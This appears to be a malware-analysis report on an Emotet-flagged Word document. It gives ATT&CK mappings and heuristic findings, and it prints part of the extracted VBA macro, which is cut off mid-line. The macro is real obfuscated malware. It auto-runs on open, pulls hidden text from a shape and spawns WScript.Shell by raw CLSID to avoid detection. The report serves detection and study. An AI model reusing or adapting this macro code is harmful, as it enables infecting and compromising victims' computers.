MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 Signed Binary Proxy Execution: Rundll32
T1059.003 Windows Command Shell
T1190 Exploit Public-Facing Application
T1203 Exploitation for Client Execution
The sample contains a critical heuristic firing for instantiating the dangerous WScript.Shell COM object via VBA, indicating an attempt to execute commands. The ClamAV detection as 'Doc.Downloader.Emotet' strongly suggests the Emotet family. The VBA macro is heavily obfuscated but appears to be designed to download and execute a second-stage payload, likely using the WScript.Shell object.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6826445-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826445-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8745 bytes |
SHA-256: b3eeac1848acc3cfef1aebdd46aa604fa75f4d0000a7a02c6281d19dad0208f7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "TLBqvTfNM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case wZAqtZPd
Case 32277100
RUkGDosS = CBool(VGWniAdrA)
NBFHUEHp = 275180876
Case 125679562
wbHRPknuR = Atn(ipBccb)
RpQiOqrj = Atn(81360477 * CLng(86146068))
End Select
For Each BwwCzz In fOVTQqw
SiLDircV = zCIjkQl * CDate(XXsVV * qCGzMQwZ) * ljYMUJi / Sin(ZbZCzrn) / wjRtSEMww + 140678628 - 7364973 + Chr(160055243) + (QEZacXDME * tozTuv)
Next
On Error Resume Next
Select Case SGwqwQniI
Case 8693235
BPRowdk = CBool(MBKmwGG)
DjjSq = 102780153
Case 184952766
kIMcUOiYp = Atn(iNiZZjk)
JoHUAkrH = Atn(232430789 * CLng(338151442))
End Select
For Each ijmnRDp In IGzWlz
btaiJzi = GnsQI * CDate(kMffzGm * ZRVkSbbLS) * XaJwhEp / Sin(AajAZnh) / YtSroqmjT + 58057218 - 57454799 + Chr(168274801) + (GiuUVti * lfapTG)
Next
On Error Resume Next
Select Case lqRliUKY
Case 314352830
XqjUU = CBool(JbowBa)
WRFmGzGhA = 195652352
Case 341093114
DAmawZuFU = Atn(zVWhI)
SjuiLwuT = Atn(167182496 * CLng(224888571))
End Select
For Each YoTXM In XQOWBpWG
YSRjPY = WOTjQlFFS * CDate(QVVQA * mmzQtNRq) * bqacCqS / Sin(jSFDdSlL) / EAZAl + 27165583 - 158067586 + Chr(244315539) + (wQIzJzc * pvfdQK)
Next
On Error Resume Next
Select Case IcltQvSFp
Case 260923777
rqYYG = CBool(ZqMujZ)
BRzUXIaP = 195964373
Case 205220872
DtvZfrqQ = Atn(FiliiGjH)
cDcDBrz = Atn(315877314 * CLng(334430944))
End Select
For Each hNmNLqUM In zKUEPki
fVpRbSu = bEAsD * CDate(jsIjbSQ * nJtHHKH) * MTXUUaJRF / Sin(sLjlUTUZb) / vjILGEi + 210200581 - 153468098 + Chr(127409647) + (jubsjU * GJjqdhaE)
Next
Set ZsiCcD = Shapes("czuiJuYEJsmWu")
On Error Resume Next
Select Case FRTAZ
Case 89750450
NDkHVtwqr = CBool(lQhEifGO)
AWGvBbl = 131740289
Case 322150338
jAUZPhpW = Atn(IjXWcpHYH)
alNmwNaGH = Atn(230309545 * CLng(210480457))
End Select
For Each ZzEKkRqR In pIHGvcz
GtDdVWA = NVMoah * CDate(TXHXSSFq * qbkcFjCk) * dBpcGDd / Sin(qXvdd) / IVninEjKB + 20998554 - 140440733 + Chr(260888041) + (lYNjTcNwj * qQDuObhuE)
Next
On Error Resume Next
Select Case jzrRC
Case 323338675
AkUjiVc = CBool(hdqstjOj)
YFzVw = 74622052
Case 90191876
pHijcq = Atn(dkHjbC)
aquwhtE = Atn(11506554 * CLng(127204881))
End Select
For Each SjtwAJ In ZGLpO
AEmbPIbiF = wiGbz * CDate(UQnoORt * SdbCHUrkM) * uuvSptrlN / Sin(uRthHvm) / BaiiLpIlj + 162362339 - 182107571 + Chr(240232542) + (OSJhDi * atwdD)
Next
CjIdvLqXN = "" + juvLh + mSLiFJD + JdQjzk + ZsiCcD.TextFrame.TextRange.Text + NkUHd + wnIBmdQ
On Error Resume Next
Select Case rlSFp
Case 40527497
ZqjJqUG = CBool(azzWhGRI)
DdzIja = 259670923
Case 11748026
ziEbUJtzU = Atn(AbCdUMHF)
uZwadFBLG = Atn(91320289 * CLng(276774268))
End Select
For Each vHvUXj In fqckmiIlB
iwbVo = UDIbV * CDate(zmjiWE * GIzdIa) * SpKvV / Sin(ALcROu) / BbQOH + 195404759 - 82981355 + Chr(296597526) + (BIIDRush * Svfoft)
Next
On Error Resume Next
Select Case wniQLqrZo
Case 332945859
SPSUdW = CBool(jUfTC)
IwFJHK = 18980131
Case 282209303
vCHQLB = Atn(fdNii)
ORYCktff = Atn(126012108 * CLng(189002490))
End Select
For Each PHMlhRdv In zUPMMLE
pCGYkTk = lEaJLmcZ * CDate(BDpTzLj * NouBLqZp) * qQVNi / Sin(czwMCmJM) / ppKHOKrrX + 275329366 - 150241716 + Chr(205713061) + (lZOBTKwM * JWPNV)
Next
Set AozjuhMQ = GetObject("new:72C24DD5-D70A-438
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.